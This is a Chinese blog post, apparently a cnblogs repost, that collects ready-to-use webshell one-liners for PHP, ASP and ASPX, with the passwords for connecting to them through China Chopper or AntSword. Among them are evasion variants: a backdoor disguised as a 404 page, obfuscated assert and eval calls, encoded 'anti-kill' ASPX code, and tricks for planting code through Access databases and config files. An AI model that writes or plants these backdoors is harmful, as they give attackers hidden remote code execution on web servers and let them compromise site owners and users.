首页 > 其他分享 >常见一句话

常见一句话

时间:2022-08-27 22:44:51浏览次数:60  
标签:配置文件 一句 常见 密码 hihack 菜刀 php

PHP一句话:

1、普通一句话:

<?php
@eval($_POST[123456]);
?>

*post后面中括号里面的内容是使用菜刀或蚁剑连接时的密码

2、防爆破一句话:

<?php
substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['password']);
?>

*菜刀地址http://192.168.64.137/x.php?x=myh0st

 

3、过狗一句话:

<?php
($_=@$_GET[s]).@$_($_POST[hihack])
?> //菜刀地址 http://localhost/1.php?s=assert
<php $a = "a"."s"."s"."e"."r"."t"; $a($_POST[hihack]);
?>

 

4、404隐藏的一句话:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body
<h1>Not Found</h1>
<p>The requested URL /error.php was not found on this server. </p>
</body></html>
<?php
@preg_replace("/[checksql]/e",$_POST['hihack'],"saft");
?>

 

菜刀连接时在配置栏添加:

<O>date=@eval($_POST[paxmac]);</O>

5、不用问号(?)的一句话:

<script language="php">eval ($_POST[hihack]);</script>

6、躲避检测:

<?php assert($_REQUEST["hihack"]);?>

 

7、变形一句话后门:

访问该网页,然后菜刀连接:/myh0st.php 密码:hihack

 

ASP一句话:

1、普通一句话:

<%eval request("hihack")%>或<%execute(request("hihack"))%>

 

2、unicode编码的access木马 :

向access数据库插入 ┼攠數畣整爠煥敵瑳∨≡┩> 编码前:<% execute request("a")%>

然后备份出webshell,密码a

 

3、配置文件插马(需要条件支持,插入的数据被写在了配置文件中):

插入:"%><% bbbb=request("aaaa")%><%eval(bbbb)%><%'

访问报错,获取到配置文件的地址,然后连接,密码aaaa

 

4、不用%的一句话:

<script language=VBScript runat=server>execute request("hihack")</script>

 

5、不用双引号(“)的一句话:

<%eval request(chr(35))%> 密码:#

 

ASPX一句话:

1、普通一句话:

<%@ Page Language=”Jscript”%> <%eval(Request.Item[“hihack”],”unsafe”);%>

 

2、免杀一句话:

<%@PAGE LANGUAGE=JSCRIPT%><%var PAY:String=Request[“x61x62x63x64”];eval(PAY,”x75x6Ex73x61”+”x66x65”);%>

 



标签:配置文件,一句,常见,密码,hihack,菜刀,php
From: https://www.cnblogs.com/simono/p/16631693.html

相关文章

  • Django入门到放弃之常见配置及基本命令
    1.基本命令1.新建一个djangoproject django-admin.pystartprojectproject_name 特别是在windows上,如果报错,尝试用django-admin代替django-admin.py试试 2......
  • 5 - 自动化测试常见面试题总结
    一、测试时接口调不通,如何去排查1、接口没有任何响应很多时候在做接口测试时,会发现接口没有任何返回,比如浏览器一直在转圈,或者返回一个空白页面。用接口工具测试时,工具......
  • 常见性能优化实践总结
    常见性能优化实践总结一:代码这一点最容易引起技术人员的忽视。很多技术人员拿到一个性能优化的需求以后,言必称缓存、异步、JVM等。有一些性能问题,完全是由于代码写的不合......
  • 常见算法题
    Golang//求2个很大数之和funcmaxNumSum(astring,bstring)string{ size:=0 alen:=len(a) blen:=len(b) ifalen>blen{ size=alen }else{ si......
  • 【AGC】崩溃服务之常见问题
    ​ 1、崩溃服务后,应用出现崩溃闪退的情况。解决方案:1、如果是集成崩溃服务后,打开应用直接崩溃闪退,则有可能是崩溃服务未能进行正确的集成配置,需要按照以下步骤进行排查:......
  • 一句话紫书简单题
    自己没办法独立想出来的会打*思维训练以及算法巩固都是很重要的。UVA11054一眼网络流。看\(a\)看着很难受,先取反,这样变成了\(a>0\)就有\(a\)的酒要给出,反之就是......
  • 常见的设计模式-单例模式
    简述实现了类在当前进程中只有一个实例,比如python-GC重写__new__实现单例classA:def__new__(cls,*args,**kwargs):ifnothasattr(cls,'_instance......
  • Python中常见的异常类型
    #Python常见的异常类型'''第一种数学数据异常'''#print(1/0)#ZeroDivisionError'''第二种,序列中没有这个索引'''lst=[11,22,33]#print(lst[3])#IndexError'''第......
  • 【AGC】【云数据库】云数据库常见问题
    ​1、【问题描述】是否可以添加支持kotlin文件的导出功能?​【解决方案】目前,我们没有这样的开发议程,因为有对Java的支持。 2、【问题描述】咨询一下云数据关联......
  • 【付费推广】常见问题合集,主子任务结构
    主子任务结构Q1:主子任务结构是什么?付费推广平台统一任务结构,区分主子任务,在子任务维度设置人群包、关键词、影子投放目标应用、oCPD转化目标。具体的介绍可参考学习《投......